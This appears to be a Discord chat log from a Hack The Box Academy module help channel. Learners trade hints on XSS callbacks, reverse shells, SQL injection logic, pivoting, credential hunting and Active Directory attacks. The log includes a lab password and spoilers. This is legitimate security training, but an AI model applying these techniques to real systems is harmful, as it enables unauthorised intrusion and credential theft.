if i diddnt have the answer in front of me i wouldnt be so upset lol.
But yeah it is what it is.
Bro again, I spent 2.5 days looking for an answer that took me 5 minutes to actually get
You're not alone at all brother
i mean i literally got the flag in 2 mins and spend 1 hour formatting the answer for the first questions and just didnt want to work so dumb lol
yeah
Next time you feel stuck, go take a 15-20min break, when you come back READ the entire lesson again, and re-try. Your best way to remember/learn.
i wonder if they do like a trim on that input field bcs that doesnt feel like it rn
i dont think you are being serious with that tip for the issue i just had right?
You're overthinking it way too hard rn bro, it will be more understandable as you follow along
No that tip is 100% serious, that rule I follow for EVERY lesson I get stuck on.
If you wish to sit there in frustration, feel free to do so. I'm only giving a recommendation
im genuinely curious. im working as a software dev i just wanted to know how they handle the input in the input field thats all. im not overthinking anything lmao
I'm just a bit confused on your question truthfully
For trimming the nmap scan? No definitely not
You make no sense bro
As someone whos 97% in the path, I can tell you that ignore whatever you are thinking, you don't need that
dude im literally just asking myself how they handle the input in the input field.
like if they take the string as it is or if they format it with regex or trim to remove whitespace that is all.
that is not even about my question before. its just a general question
Hi People! Is there anyone willing to help with the Password Attacks: Credential Hunting in Network Shares module page? I've spent about 5 hours on it and still the second question remains unsolved. I tried each tool discussed on the target, each pattern mentioned, enumerated everything manually, though the only thing I assumed was the right answer was also a dummy. I may provide any details if needed (except the commands I used, cause my PwnBox ended several times). I definitely have missed smth...
dude im a software dev and just curious its not about hacking at all rn im wondering about the app.
I won't be able to answer that question, as I have no idea bro. Hopefully someone else can
doesnt matter. i was just thinking out loud dw.
Dm me if you'd like I can assist
sorry my bad for misguiding you, most of what I said is generally applicable but smb wants to that special case 😅
So to get smb banner you have three options
nmap -sV and get the version column that is the banner
Wireshark and use smbclient, you would see banner in Wireshark hopefully.
Or make smb initialization request that requires non-printable character so you would have to use python scapy or something similar, that's the reason nc was not working. Again sorry for inconvenience
all good. im here to learn 🙂
that was alot for me what u just typed, i will focus for now on nmap. but thx ❤️
no chat br in server ?
This might be a dumb question.. But do i need to open HTB and get the target IN my VMware to make it all work? or can i get a target on my own pc and just make sure the OVPN is working?
Under File Inclusion > Local File Inclusion there are lots of code snippets listed that show how the input is sanitized or altered before being passed on to the webpage. For the example page given, where would I find the snippet of code given earlier?
Connect to VPN and target will be opened to your machine
i actually just did this one yesterday,i remember looking around the classes to find credentials
it should look like $rcon = new rcon (something, password, somethingelse)
Thanks for responding! Might have another problem then.. Cant get my rev shell to connect ill go check it out again!
Get-NetUser -TrustedToAuth is not working in Kerberos Constrained Delegation section in windows attacks & defense module
Whenever I execute the command, it says the parameter is not found.
any1 know how to fix this? this is pivoting and tunneling > SocksOverRDP (yes i did set it to the modem setting)
Hey guys I wrote this yesterday but I guess people were signed off. Can anyone help me figure out how to test each field in a login form for XSS session hijacking?
The module explains how to do this.
You can do both. I prefer a request and a different payload in each field
It's just a bit confusing tbh. It says use the payload in each field to send http request back to our server but does that mean I should have nc listener running? Because when I do and submit a field with the payload I'm not getting any response
I would start a web server. Then you can also see if several fields want to access your web server.
Ok I'll try that. But you see how that seems confusing? Because it doesnt say anything about starting web server. The module only discusses php server. Doesn't even say anything about nc server or http server
I'm not a pro at this so sorry if I sound dumb
Well, it is a Tier II module. That sets certain basic requirements. For example, how you can recognize whether an HTTP request has been sent to your system.
We are all here to learn.
Sorry, i keep getting stuck on Nibbler..(i know i know..) i seem to do everything it says yet my rev shell wont work, i get no responding on my -lvnp <port> anyone that could check a bit more in depth where it might go wrong? been working on it for several hours now but i cant find it
The modules are designed so that you learn the basics in the Tier 0 modules. You will expand your knowledge with the Tier I and II modules.
Also just curious is Active Directory the hardest/longest module in your opinion?
By the way, the cheat sheet mentions how you can start a web server or a Netcat listener
You are absolutely right lol wow.
idk, probably the longest module.
Hold on, could it be, the rev shell code they give. is it possible that that one doesnt work(anymore) and i have to use another code? or is it 100% working with that code
Hi I've done it yesterday
Send me a DM I can help, got notes for all stages of it.
@wild sedge But did you find the libs to debug the app locally?
Hi quick question
Attacking enterprise networks -> external information gathering
The question is:
"Perform vhost discovery, what additional vhost" exists
Im bruting with ffuf, filter the right size but i get some garbage unrelated vhosts with 'size:0'
You are a hero! That worked. Reduced the MTU from the VPN connection and now I was able to connect! Thanks ❤️ @feral nimbus : Sorry for pinging, but maybe for the next trouble shooting 🙂
hi guys
I haven't been able to connect to RDP for 4 days in a row.
AD module - htb academy
i can't share screenshot on the channel. so how to fix it
change vpn regions?
can't connect is vague: do you receive errors?
if it's not related to server moderation, no
if you want to be able to post images in here there's instructions in #welcome on linking your HTB account to the discord
It's from a password attacks module, where I found the password with LaZagne, but it doesn't accept it as a correct answer.
this section? https://academy.hackthebox.com/module/147/section/3714
i tried but nothing happen
the first question
RDP to 10.129.188.165 (ACADEMY-EA-MS01) user "htb-student" and password "Academy_student_AD!"
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
and i see black screen
press enter
nothing change ahah
@south marten ?
this is the output on my terminal
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
yes, this one
and the rdp box is black
the first question on this section has nothing to do with grabbing a password
so when you press enter on the black screen, nothing happens?
is not with LaZagne?
this question, yes?
What is the name of the file stored on a domain controller that contains the password hashes of all domain accounts? (Format: ****.***)
ok now it's done. i pressed enter two times in a row
thank you
is not this question
aaa. im sorry
well that's the "First question" on that section
What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive) ?
yes, is this one
the answer is We..23
is not ? FS...123
no
look carefully at what the question asks and what lazagne gave you
the password you got was for a different service that bob uses
there's also other methods to find passwords that were showcased, not just lazagne
lazagne may just show stored passwords
yerp; LaZagne only looks for stored credentials, it doesn't really check other files or programs that may be like password managers
and why if i try to login in winscp with these credentials i get an error
Because the username may not be "bob"
Also it's an internal machine that's being connected to via winscp
Scp is a file transfer protocol utilizing ssh to securely transfer files
no?
Yes, also module is above t0, be careful with spoilers
You don't really "log in" via scp
You utilize the credentials to transfer files
scp is a more strict file transfer protocol
so, i dont need to use the password i get? sorry for all these questions, but im stuck
Is that what the question is asking you to do?
Maybe the credentials are saved in a password manager or a file somewhere
You're getting hung up because you found something that wasn't asked for (yet) because you assume the tool used is some sort of all access tool
When, if you read the section, it simply tells you that LaZagne only looks for insecurely stored credentials via popular applications
I.e. Firefox stored passwords
so. if i want to find the password via ssh, i need to use hydra?
No
Everything you need to answer all the questions is found in context of the user you're given
Utilize the different methods showcased in the section. Not just lazagne
yea, i have all the answers, the only one i don't know how to do is the ssh :(
I've been hinting at it a fair bit
The section hints at utilizing windows search 😉
Heck you can probably find it by just clicking around
Yep pretty much all the questions are able to be answered without using tools
The second one doesnt return anything to my nc listener. My question is why does addin "> work?
You're escaping the bounds of the existing tag you're injecting into
Oh ok so everytime I'm testing xss vulnerability i should try both ?
<Img src="[image link]"> by injecting a "> you prematurely close the tag, so <img src=""> <your payload>
All three, single quotes exist too
@south marten you got it figured out?
im doing other question, i was tilted searching the ssh password
The /directory is so you don't have to do each individual field
Hello!
I'm doing an AD module and i don't understand one thing in this fragment:
"Next, we can use lookupsid.py from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for a SID lookup."
so, when i have this command:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
What should I enter as the IP address? The DC IP of this child domain? Or is it the IP of the compromised child domain?
So you'd use /username for the username field /comment for the comment field, etc
The DC it looks like
Anyone else has the same issue that libs dir does not have jars to debug locally #modules message
tysm!
But wouldn't you have to know the name of the Directory or you just assuming its called username. Like the field vulnerable in this case says Profile Picture URL but I saw somewhere to use "/picture" like how would they know its called that exactly?
You're misunderstanding the purpose
Yes i think so
The purpose is to call back to your system
By using the field /username in the username field, for instance, when you call back to your system you know it's the username field that's vulnerable
Tbh I have another problem, a little below it says:
Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the domain SID S-1-5-21-3842939050-3880317879-2865463114 and attach the RID of the Enterprise Admins group
So is this definitely the ip of the DC child domain?
It's been a minute since I've done this and it's above tier 0 so, spoilers
Search on the system "password"
Or even look at the folder labeled "work stuff"
...
Ohhhh so I can just use the payload in each field at once, with different directories, instead of refreshing page and trying each field. That way, the one thats vulnerable will return the corresponding directory in one fell swoop
So you're still misunderstanding
I thought it was much more difficult, i am just stupid
It's not about the corresponding directory being revealed
I stopped looking at Workstuff since I found the GitLab credentials.
It's just a way to say "this field is vulnerable" without having to refresh a million
No what i meant by corresponding is it will return whatever directory name that I put for a field thats vulnerable
Ah gotcha
Yes thats what I meant. Thanks
Thanks for clarification
understandable, thank you anyway
Please help me how can I pay for monthsly billing as a student 🥹
Support is not provided on Discord, you'd need to reach out to support on the site.
open support on the web
Thanks
👍
Hi
I'm stuck in this question:
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Disabled user]" visualization, if it is available, so that it includes failed logon attempt data related to disabled users including the logon type. What is the logon type in the returned document?
I searched through the SIEM and I found out the LogonType is 2, and I got that the answer is incorrect.
Please anyone help?
hey, im doing active directory and NTDS, and im doing the kerbrute and i have an error with the domain
hi guys. after a week of finishing my photoshop final assignment and taking three days to get some other stuff done I had to get done, I am back in the skills assessment for pivoting, tunneling, and port forwarding module. I am trying to use ligolo to do it and I'm having some issues but I think if I post a screenshot it will spoil something so is anyone available to DM?
I'm using @gray yacht 's video on ligolo to do the assignment
I am able to get past the first pivot but the second pivot is not working
so having trouble not on single pivot but on double pivot
Feel free to DM will reply in a little while!
Ok thanks
Read the question again, it's not looking for attempts. It's asking for the type of log on the user used.
hi guys I have managed to get through the double pivot portion of the skills assessment for pivoting, tunneling, and port forwarding. I am on the second to last question. I managed to get the IP address of the internal network to appear. I think I have the username of the second RDP to get to. But now I need to find the password for the user in order to do a second RDP. I was able to RDP into first pivot into Windows host. But now there's another Windows host deeper in the network I want to connect to. I know RDP port is open on the machine.
I'm guessing its like a triple pivot I need to do?
No harm in trying it
but in order to do it I need to get password of third host
so I got first pivot to work and I got second pivot host done with ligolo
but I'm having trouble finding RDP creds for third pivot
I know port RDP is open
on the host
Cant recall really, but I'd recommend more enumeration
ok
ok I'll figure it out later I gotta go the cafe I'm working at is closing soon
will try again later tonight
AD enumeration and attacks has been the most giant module..lol
Thank you for posting this. I was not giving it 10-15 mins before I'd decline and try again and I was getting really frustrated 😦
Does the bug bounty path on HTB really teach you everything to do bug bounties on Hackerone?
It helps with it
Brain recoup time until tomorrow….
I am having issues logging in to my academy account, anyone that could give me a hand with that?
support
Need some help? Learn how to reach the support team on Academy.
thanks, giving it a try
that support chatbot was a very confusing experience... and in the end just told me "we will be back tomorrow", I still cant access my account...
Password Attacks modules have no answers under "show solution". Is that expected? Will there eventually be solutions?
The whole module had a makeover just a few days ago so the walkthrough most likely just hasn't been updated quite yet
You generally shouldn't need the solutions anyway
I'm brand new to pen-testing, so it helps a lot
I am new as well, and I have my opinions on the solutions that I've voiced before.
Figured that was the case, appreciate it!
You can ask for nudges in here on the module/section you're having issues with and someone can push you in the right direction
I generally dislike just giving the solution just bc you're stuck, imo it just reinforces bad habits when you can just click a button and get the answer
@stuck hollow please make sure not to spoil content from modules above tier 0. (hostnames, passwords, usernames, etc)
ok sorry
It can't find the realm, make sure to add the appropriate hostnames to your hosts file and make sure you're on the vpn etc
vpn is ok
hello 👋
is this where i can ask questions from the web requests module?
Yep, this is the channel for asking questions about modules in general
awesome!
so um im doing the web requests module and for some reason the pwnbox doesn't connect to inlanefreight.com?
should i be putting more info into the curl?
so how can i show what its going on? /etc/hosts and vpn are ok
Which specific section? are you able to ping other sites like google.com?
not sure, it can also mean the creds aren't right i believe. i don't know the whole context and haven't done that so i can't help much.
its the first section and yes i can ping google, i feel like im missing something sorry my first day trying htb
i think i found the flag by adding on the http:// part also for submitting flags should i include the HTB{}$ or no?
yea so i got it basically you need to
curl -O https://(IP):(PORT)/{file you want it to be}
and then vim it
made it thanks!
https://academy.hackthebox.com/module/147/section/3714
I got lazagne on RDP windows machine, but not able to install python on it (through python.exe x64 installer). Python is required to execute lazagne.py as there is no lazagne.exe in laZagne-master directory.
What’s keeping you from uploading lazagne.exe yourself?
MMM, a learning moment for me not to stick to the flow, but keep in mind what is required and not what we are getting by going with the flow and trying to make it work somehow. (Sorry, it does make sense in my head!!) Thanks mate, for the solution and the learning 🙂
Great job
lazagne has a .exe
No wonder windows is so bloated, hacker be putting all the carbs in it
if i had the skill, i'd make a carbonara.exe 
Its been eating all the potatoes and now has to worry bout pasta?!?
Them potatoes be going rogue
Hey , just a non-pentesting question, how do you guys send screenshots in this chat. I have tried ctrl+c, ctrl+v,,,,, + (plus) button to the left of this chat box,,,,and also drag&drop.....Is that just me or anyone else also having such an issue
Hello guys hope you are all doing well.
I am new to this field. Till now I have solved only 2 rooms in htb and counting more in the upcoming days.
Could you provide some suggestions/advice how shall I proceed with this journey.
If I am asking it in the wrong chat please redirect me to the right place. Thank you😊.
I believe you need to be hacker level to post images
Got it. That's kind of a motivation. Thanks.
no rank required for this channel. just a linked account
hmmm, how can i link my account?
as @cloud urchin pointed out to the other person; there's instructions in #welcome to link
Awesome, can paste images now, Thanks.
"lazagne has a .exe"
I have solved the exercise by uploading .exe separately but just want to learn what i might be missing. Downloaded from: https://github.com/AlessandroZ/LaZagne. Can't find lazagne.exe in it
there's a /releases/ tab in the github repo
windows priv esc (useful tools) tool name watson (description - Watson is a .NET tool designed to enumerate missing KBs) What's referred to as KBs here? (I already googled this stuff but i had 0 clue after searching too)
Is there any alternative to droopescan for Joomla and drupal enumeration? As droopescan is not maintained and cannot be used with python3.13 and I don't want to manage multiple python instances.
i think it works with python2 command
i did it without any obstacles i remember
otherwise theres a tool - joomscan try that maybe
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
This channel is for discussion of the various modules on Academy. You'll need to read the #rules and follow the instructions in #welcome to gain access to most of the server. Then you can post your questions in #general or #1024429874246590575 etc.
I'm getting thrown back to modules when clicking on done reading
Done 
they changed it to python3, may need to go back to python2 version. But python3 version is giving following output even with docker.
```
┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker build -t droope/droopescan .
...snip...
┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker run --rm droope/droopescan
Traceback (most recent call last):
  File "/usr/local/bin/droopescan", line 3, in <module>
    from dscan import droopescan
  File "/app/dscan/droopescan.py", line 4, in <module>
    from cement.core import backend, foundation, controller, handler
  File "/usr/local/lib/python3.13/site-packages/cement/core/foundation.py", line 8, in <module>
    from ..core import output, extension, arg, controller, meta, cache, mail
  File "/usr/local/lib/python3.13/site-packages/cement/core/extension.py", line 8, in <module>
    from imp import reload # pragma: no cover
    ^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'imp'
```
Got it man thanks.
So for discussing issues faced in any machine or even asking for advice, where do we ask them? Can we do it here or are there any separate channels for that?
for those having this error, edit Dockerfile, from python:3 to python:3.10
This channel is for Academy's modules. If you're working on a box that's #boxes.
Noted 🙌
did you try installing imp module? (you should have used pip install -r requirements.txt) to avoid that python version error
Howdy, I really hope I am in the right place for this, if not sorry for the intrusion. I was reading though some of the modules and I saw MacOS Fundamentals you need access to an Apple product? So there is no spawning the in house machine to do this lesson? Thanks for the help.
Correct, you need access to an Apple device
there's quite a few disclaimers on the overview of the module that says you need access to a MacOS device to be able to do stuff. It's not very cost effective (or legal, i think) to emulate MacOS devices
Hey guys, I am on the sqli fundamentals and subverting query logic and want to know the difference between these two queries. In the second one username was tom and it logged in as admin
imp module is deprecated from python3.11 onwards and outright removed from python3.13. It is replaced by importlib, I tried to just change module name, but that was not enough for it to work, so best way to make it work is to use python3.10 in docker.
ok noted, Thanks
Hello just wanted to ask if its possible to do the skills assessment of pivoting module with ligolo-ng?
Since every review of CPTS exam i saw used ligolo-ng i thought of learning it and try to finish the skills assessment with it
Why don't you try it and find out?
Hi I am on LFI https://academy.hackthebox.com/module/23/section/251, basic LFI lab, the connection is resetting when I enter ../../../../etc/passwd however, I watched a solution it used to same payload to read passwd file. Is there something wrong with this lab?
Hi Folks, I try out here again.
I have contacted HTB Support about an "issue". Unfortunately, the problem seems to be on my side.
So, on this module https://academy.hackthebox.com/module/87/section/906, there is a question at the end. I am 100% sure about the answer. However, it seems to be false. I have crosschecked, and it is sure it's the good answer. There is some typography specificities ? I don't get why there is an error to be honest... :/
Query 1:
SELECT * WHERE username = "tom" OR (1=1 AND password = "")
Output:
Returns only 1 row, the tom user. 2nd part of the query (after the OR) returns no rows because although 1=1, nobody's password is blank (" ")
Query 2:
SELECT * WHERE (username = "tom" AND password = "") OR 1=1
Output:
Returns all users in the table. 1st part of the query is false because tom has a password (it is not blank), so no rows are returned. Second part of the query (1=1) is always true so it returns all users in the table. You are logged in as admin because the app logic is written to log you in as the first returned row, which can be anyone, which in this lab's case is admin.
Why is the first row returned admin when selecting *? I'm not sure. Maybe because admin was the first user inserted into the database.
Wow actually worked like a charm
why there is no cheatsheet in session security module?
yea ligolo is goated you should use it for AEN and the exam too
The difference is the evaluation order,
First one:
USERNAME=TOM? OR ('1'='1' AND PASSWORD='')
# the line in the parenthesis will always be false unless you give it the right password so it's just:
USERNAME=TOM OR FALSE
Second one:
(USERNAME='tom' AND password='') OR '1'='1'
# Since it always evaluates to true it logs in as the first user in the table which in this case is: Admin
damn bro beat me to it 

I wonder why HTB doesn't teach it
I just learned it in like 35 mins or something and my god everything is clear and smooth
pluggable
They probably published the module before ligolo-ng was released or got popular
^
the module came out before ligolo-ng was a thing, and even then when people were picking up on it at first it was in the EARLY dev stages like 0.4.2 or something like that
could HTB add a whole ligolo section? maybe
but then that would break one of the most important modules of the path 
maybe towards the end of it
but i do agree that ligolo-ng trivializes learning the rest of it, and that you should grasp the fundamentals before using it
thank you @waxen totem and @pure seal I overlooked the parenthesis part
well there won't be any parenthesis in the actual query but it's just which goes first: AND vs OR
AND is always checked before OR similar to how we multiply before we subtract
I see like pemdas yea
Just finished the pivoting module skills assessment with ligolo that tool is amazing
I will also redo the skills assessment with the things taught in the module
I really enjoyed this one lol
Thank you everyone
guys please help :[
I did ssh into the target, but I am not able to understand what to do exactly :=[
Tried to open my pwnbox and well something went wrong and I get to wait until tomorrow to try again. I am on the Windows Fundamentals and when I went to interact, it was not interacting, just the starting ... and nothing. Can I do this in my own VM?
yes
are you trying to replace the pwnbox or the target?
you can't replace the target
pwnbox
yeah vm instead of the pwnbox is fine
use netstat to check for services listening on all interfaces (0.0.0.0)
I got connection fail.
did u connect to the vpn
well, ummm, not really kind of. I downloaded it I guess thats also missing...
but how do I do that, connect to the VPN.
do
sudo openvpn <path-to-downloaded-file>
Hi, Iam new here and have a question…what is the “academy VPN” for?
utilizing your own vm or machine to connect to the academy network and access the 10.129.x.x machines
if you're using the pwnbox you don't need to download/use it, the pwnbox (in-browser vm) connects automatically
Ohhh okayyy, thanks!
the answer is not 10...then what is it?
you have some localhost ips in there
also grepping for 0.0.0.0 is misleading, and that really shouldn't be the way you tackle the question
0.0.0.0 is just a wildcard address
something may be listening on a specific interface (that's not localhost) and not be 0.0.0.0
Could you please tell me the command to use then?
you'll want to inverse grep (grep -v for 127.0.0, knowing the localhost ip range is useful here)
i don't really deal in handing out exact commands, rather explaining how you can figure out the solution from where you're at
that's what the question tells you, doesn't it?
it wants the count of all listening interfaces that AREN'T localhost OR ipv6
you already got the list for not ipv6 with the '-4' option lumped in
just gotta work through the rest :)
but the wildcard address is used for services listening on all interfaces no? the question seems to ask for the count of services listening on all interfaces (not just localhost/ipv4), not the count of listening services on all interfaces except ipv4 and localhost
or am i misinterpreting the question
take a closer look at the image they sent; telling them to just grep for 0.0.0.0 overlooks the simple fact that it'll also look in all columns for it
grepping 0.0.0.0 isn't the same as starting a service listening on 0.0.0.0 as well
grep is searching the string value
yea, the grep seems to cut the table headers which also includes foreign address, they should only be counting the local address column which provides the answer
of course counting only 0.0.0.0s in the local address column
which is misleading
because NOT ALL SERVICES may be on 0.0.0.0
even discounting the localhost services
well if a service is set to listen on ALL interfaces, its gotta be on 0.0.0.0 right?
you're kind of teaching bad practice saying to grep for 0.0.0.0
i see
while yes, if a service is listening on all it'll be on that -- if a service is listening on one (and not 127.x.x.x) then you'll very easily miss something that could lead you forward
for instance it's running an internal share only accessible on one interface so that other computers on that specific network can access it
that makes sense, but for the purpose of the question which is to find services listening on ALL, is there a better way other than to grep for 0.0.0.0 and maybe also use awk to get the local address column only?
think beyond the purpose of the question specifically
you'd want a command that can be used generally, that gathers the most amount of information that you want and only excludes the information you don't
while in that specific instance, it works fine, think flexibly
by telling someone only to grep for 0.0.0.0 doesn't actually answer the question being posed.
guys, I am just in Linux fundamentals, do u recommend any book to understand all this networking with ipv4, ipv6, what is wildcard and :: this double :: thing when I netstat?... I am very confused...
the question being posed is asking for NOT localhost OR ipv6
so you're going to look for a command or string of commands that answers NOT localhost OR ipv6
wildcard just means it can be used for anything
:: is ipv6
for instance 0.0.0.0 being a wildcard means that it will listen on all available interfaces on the device
this happens when you start a web server or something without specifying the interface name or ip (depending on the program)
Just practice
if you run python3 -m http.server it will, by default, start on all interfaces on port 8000
and instead of listing out all the interfaces it's on, it's shorthanded to 0.0.0.0, which in networking means all
so you'll get the output
started http server on 0.0.0.0:8000
Mmm, You dont need to put the Port in the final
correct my example command i explained how it works by default, without specifying a port
Yes, but be careful if you are using pfsense or something, check that the port is not busy.
i'm aware, and i'm being very general here
i'm not trying to overcomplicate the explanation by throwing in additional circumstances
Im saying to User 49, i know you know a lot more
ok so "services" on my laptop "listen" from "interfaces" on my laptop. Now to find "ports" being used I use "netstat" where "l" means "listen" and I grep for "0.0.0.0" which is also called as "wildcard" so this weird looking ip "0.0.0.0" listens to available "interfaces" on the device and that's what the question is asking...
so grep doesn't treat 0.0.0.0 as a wildcard
it treats it as a string
the common wildcard in grep is *; which captures everything
with grep you are telling it to search for a pattern
to keep it simple
word
alpha
word2
if you do grep on that text list; for instance grep word it will give you the lines that contain the pattern "word"; this includes the line with word2
I do get what grep does because it was there in the linux fundamentals reading content
so it's not treating 0.0.0.0 the same as a tool that starts a listening service is
it's just treating it as the string "0.0.0.0"; meaning anything if that pattern exists anywhere in the line, it matches
it doesn't discriminate table fields
ok got it :] thnx very much
0.0.0.0 being referred to as wildcard is ONLY in the networking sense, outside of networking it's just another string
which is why, if you noticed in the output, several of the listening ones (that are on the localhost range) weren't just 127.0.0.1; though we typically associate 127.0.0.1 as THE localhost address
127.0.0.54 i believe was one of the local listening services
ohk .. I thought at one point that 127.0.0.1 was localhost range but actually it is 127.0.0
it's actually 127.0.0.0/8 meaning 127.0.0.1 -> 127.255.255.255
(though technically it's the loopback, localhost is the more common term)
but the main thing to remember with localhost: the only machine on the network that can connect to a machine's localhost is itself
as long as you understand the basics of it; you're fine. HTB has 2 basic networking modules if you want the basics that you'd learn for something like Net+
overall you won't need to really know addressing and assigning ips, the networking knowledge more serves as a shorthand for understanding than as a "hey you're gonna have to create subnets"
thnx for all the help
How password attacks can be tier 1 💀
because it's not a fundamental or basic topic
Basics topics are Other tier?
well it's also just a general classification. Tier 1 would be like saying "you understand the fundamentals of what's being discussed, so let's actually get into it"
i definitely say it should be tier 1; maybe tier 2 -- but def not tier 0
it's not extremely complex and doesn't require much moderate knowledge to be able to understand it, and things are mostly still explained
Hi
👋
Hi can someone give me a hint on Skills Assessment from the File Upload Attacks Module, please?
I don't want to spoiler anything so dm please
Nobody to help me to figure this out ?
cd .
How do i solve this:
What other user in the domain has CanPSRemote rights to a host?
It is on the Privileged Access section of the Active Directory enum and attacks module
So I did the openvpn and now it seems stuck. Last line reads 2025-6-11 09:36:39 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt
btw I am using ubuntu not kali
I think I figured it out
could anyone help me with my question?
i believe that bloodhound has a built-in query
Hello, I have a problem with some questions. It asks: Which kernel release is installed on the system? (Format: 1.22.3) I answered 6.11 and it says it's wrong. Another question: What is the name of the network interface that MTU is set to 1500? My answer is tns0 and it says wrong. I tried another one, ens3, because I found two with that MTU set, ens3 and tns0; it says wrong for both. I tried every answer and I can skip it. Can anyone help me?
Why am I not getting in. I have the openvpn in a seperate tab and I keep getting this when I do xfreerdp.
boys anyone help me with my?? problem
Hello, I have a problem with some questions. It asks: Which kernel release is installed on the system? (Format: 1.22.3) I answered 6.11 and it says it's wrong. Another question: What is the name of the network interface that MTU is set to 1500? My answer is tns0 and it says wrong. I tried another one, ens3, because I found two with that MTU set, ens3 and tns0; it says wrong for both. I tried every answer and I can skip it. Can anyone help me?
```
┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ uname -r
6.11+parrot-amd64
┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ ifconfig
ens3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 83.136.253.137 netmask 255.255.252.0 broadcast 83.136.255.255
        inet6 fe80::a4ba:3bff:fe08:7997 prefixlen 64 scopeid 0x20<link>
        ether a6:ba:3b:08:79:97 txqueuelen 1000 (Ethernet)
        RX packets 8987 bytes 41708094 (39.7 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 7100 bytes 6570384 (6.2 MiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 9831 bytes 5940284 (5.6 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 9831 bytes 5940284 (5.6 MiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
        inet 10.10.15.16 netmask 255.255.254.0 destination 10.10.15.16
        inet6 fe80::5c24:8b57:211d:57ee prefixlen 64 scopeid 0x20<link>
        inet6 dead:beef:2::110e prefixlen 64 scopeid 0x0<global>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
        RX packets 72 bytes 6048 (5.9 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 78 bytes 6372 (6.2 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$
```
Guyz if you want minecraft premium account DM fast
i've tried every single query and i can't seem to get the right user
someone know how to hack?
im not trying to hire i wanted help because one of my friend hacked me and put all his stuff in a hosting server the reis host im trying to get it back
i really wanted to see if someone could help me
that's not what this server is about
all my payment methods are there
You need to ssh into the target machine first
what you're asking for is illegal
is illegal to ask help here??
reach out to the authorities
hacking someone is illegal, yes
oh
Yes, please read the #rules
sorry just wanted to see if someone could help
The query should be in the module
my bad
hacker4hire also refers to asking for someone to help hack someone else for you
the authorities :))
The only place that may be able to help you is the local police
Thanks so much dude, u the dawg, I seemed to have skipped it cause I did not bother memorizing the query
Read and follow #welcome
every one please help ?? some one answer
hey guys why can't i send screenshot in here?
It says how you can change your name
Make sure you have SSH'ed into the target
YARA & Sigma for SOC Analysts
Page 5
Hunting Evil with YARA (Linux Edition)
Can someone help me with this problem? I am for some reason not understanding what processes I am looking for when I do the yarascan.
not related to modules but was curious that any of you tried disabling defender using powershell or cmd? or is there any modules on htb regarding it
"Credential Hunting in Network Shares" They have updated it and I cannot get anything out of snaffler.exe, apart from the user jb... which I rdp into and find nothing with snaffler again
anyone experiencing lags in Session Security - skills assessment?
I can't download the pcap file(even after few resets it is still not letting me to download it)
My answer was good and worked on another web browser. Maybe my current one was too much hardened? Does the question system require specific components to be enabled on the web browser?
Hi can someone give me a hint on Skills Assessment from the File Upload Attacks Module, please? (dm, I don't want to spoiler anything, I've already tried a few things)
Hey has anyone done the Password attacks module? updated one? I am stuck on skills assessment as well as Pass the certificate parts.
I have
may I DM you please?
Sure
Is there anyone who can teach me ethical hacking?
HTB academy
@west arrow I already tried it
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@summer bronze See the link above
@west arrow I mean penetration testing
If you wanna learn penetration testing the Pentester Job Role Path in HTB Academy is a really good resource
@waxen totem Okay I'll give it a try
Hey, but how did you manage to utilize the mimikatz tool, since it is not present on the machine and you have to internet access?
is anyone also stuck on the password attacks module? specifically the part on writing custom wordlists and rules
i can't seem to generate the password required
bro file transfer
ahaaa of course, thx
xfreerdp /v /u /p /drive:(name), ( your path)
someone can help me with NTDS.dit
Would appreciate help on this. Have been stuck on it for a week
which section
The writing custom wordlists and rules challenge in the password attacks module
I tried writing custom wordlists and rules and some other pre made rules but I can't get the right one to Crack the hash
you have the mut_password.list already?
Yea I've made one myself but I've deleted the file 🥲
i'm not too sure if i have what you are talking about
